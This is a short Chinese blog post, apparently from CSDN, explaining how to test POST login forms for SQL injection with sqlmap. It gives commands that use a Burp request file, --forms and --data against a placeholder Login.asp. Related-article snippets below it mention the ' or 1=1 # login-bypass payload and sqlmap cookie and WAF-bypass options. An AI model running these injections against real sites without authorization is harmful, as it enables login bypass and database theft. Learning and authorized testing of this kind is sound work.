POST登陆框注入

最新推荐文章于 2023-07-12 18:39:44 发布
最新推荐文章于 2023-07-12 18:39:44 发布
阅读量477 收藏 2
点赞数
分类专栏: SQLMAP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42452926/article/details/104719722
版权

1.burpsuite + sqlmap
利用burpsuite抓包保存为txt,利用sqlmap指定文本注入(此方法本人未实战过,是很普遍的方法,详情请自行百度)

注入点:http://www.xx.com/Login.asp
sqlmap.py -r test.txt -p Password

2.自动注册表单,截取数据。(直接在后面加[–forms])

sqlmap -u “http://www.xx.com/Login.asp” --forms

3.指定参数

sqlmap.py -u “http://www.xx.com/Login.asp” --data “标签名1=数据1&标签名2=数据2&标签名3=数据3…”

注:填写的数据可以随意写,但标签名一定要与input标签中的name一致,不同的标签名对应不同的name

sqlmap -u “http://www.xx.com/Login.asp” --data “Username=1&Password=1”

注:Username与Password分别为Login.asp页面中的两个输入框的名字,将鼠标移动到输入框上面右击选择“审查元素”即可看到,每台网页的Login页面都不一定是一样的,渗透老鸟应该很容易懂。本人不才,可能解释的不太清楚。

怪獸哪裡跑
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
POST登陆10cf
07-21
POST登陆10cf源码
POST注入
weixin_45790675的博客
10-25 1569
POST注入 一、POST注入介绍 注入攻击的本质是把用户输入的数据当做代码执行,POST注入一般会在表单的地方。 1.有两个关键条件: ①用户能够控制输入 ②原本程序要执行的代码拼接了用户输入的数据 2.POST注入高位点: 登录 查询 各种和数据库有交互的 3.最经典的POST注入莫过于万能密码: ’or 1=1 # 万能密码就是引出注入手法,你在登录的时候输入什么都能登录 二、例题 例如第一题 首先我们查看源码 $sql = 'select *from user where username
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 3756
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
POST注入(账户登录页面)
zsdddddss的博客
12-25 207
POST注入(账户登录页面)
POST注入--万能密码(zkaq)
最新发布
weixin_74410605的博客
07-12 787
入门简单的sql注入中的post注入,一键学会万能密码
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2822
使用sqlmap进行post注入学习笔记
登陆post注入教程
weixin_33861800的博客
11-28 326
2019独角兽企业重金招聘Python工程师标准>>> ...
Qzone2009post登陆
08-21
Qzone2009post登陆源码系统结构:组合_保存数据,组合_载入数据,读取,======窗口程序集1||||------_超级按钮_登陆_被单击||||------__启动窗口_创建完毕||||------_图片_验证_鼠标左键被按下|
易语言QQ网页POST登陆
08-20
易语言QQ网页POST登陆源码系统结构:取自动验证码,密码到MD5,后台登录QQ,取文本中间内容, ======窗口程序集1 || ||------__启动窗口_创建完毕 || ||------取自动验证码 || ||------密码到MD5 || ||---
易语言POST迅雷登陆
08-20
易语言POST迅雷登陆源码系统结构:检测账号,密码加密,登陆, ======窗口程序集1 || ||------_按钮1_被单击 || ||------检测账号 || ||------密码加密 || ||------登陆
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4596
SQL注入原理-POST注入
post 未经授权_意大利后台登录POST注入实战
weixin_39673002的博客
12-03 367
0x01 前言这篇文章记录的是当时利用SQLMAP和手工方式对某“意大利网站后台登录POST注入”的过程,POST注入漏洞一般存在于网站搜索查询、前/后台登录等功能。以前也一直想写一篇关于POST注入的文章,可惜一直没找到用于演示的网站,朋友@冷空气给我发了一个,感谢!0x02 Sqlmap注入后台登陆打开目标网站后台,登录帐号文本中输入个'单引号来简单判断是存在SQL注入漏洞...
渗透测试基础-POST注入
weixin_45488495的博客
04-08 1975
渗透测试基础-POST注入POST注入是什么POST注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! POST注入是什么 post是一种传参方式,大多出现在各种处,比如登录,查询,和各种与数据库有交互的注入攻击是:用户输入的数据当作代码执行,这里有两个关键点 关键点一:用户能够控制输入 关键点二:原本程序要执行的代码,拼接了用户输入的数据 post注入与get注入没有本质的区别,无非就是一个在表单
钉钉授权登录_韩国网站 登录POST注入到Getshell
weixin_39861054的博客
12-04 128
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
登录页面的SQL注入漏洞
m0_61974571的博客
10-12 3678
1、在Linux准备一套Xampp或者Phpstudy:模拟攻防2、在vscode安装Rremote Development插件,进行远程调试新添加主机 在opt/lampp/security创建项目 login.php welcome.php 二、进行登陆的渗透测试 注入类攻击的核心点: (1)、拼接为有效的代码或语句(2)、确保完成了闭合,并且可以改变原有执行逻辑通常并非处理一下就可以完成拼接和闭合,需要不停的尝试,知道出现不一样的结果。这个尝试过程建议使用python+字典快速处理上述代码一共存
HTB_Appointment 靶机之登录万能密码、sqlmap post 注入
网络安全学习
04-22 3721
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
sqlmap命令详解
Pitbull2014的博客
12-20 1013
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap之(六)----POST登陆注入实战
你身后的人
04-21 705
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下   2.列数据库:  [html] view plain copy sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs  注:-r表示加载一个文件,-p指定参数  其中出现...
post请求SQL注入
03-10
我可以回答这个问题。Post请求SQL注入是一种常见的网络攻击方式,攻击者通过在Post请求中注入恶意SQL语句,从而获取或篡改数据库中的数据。为了防止这种攻击,开发者需要对用户输入的数据进行严格的过滤和验证,确保输入的数据符合预期的格式和类型,同时使用参数化查询等安全措施来防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值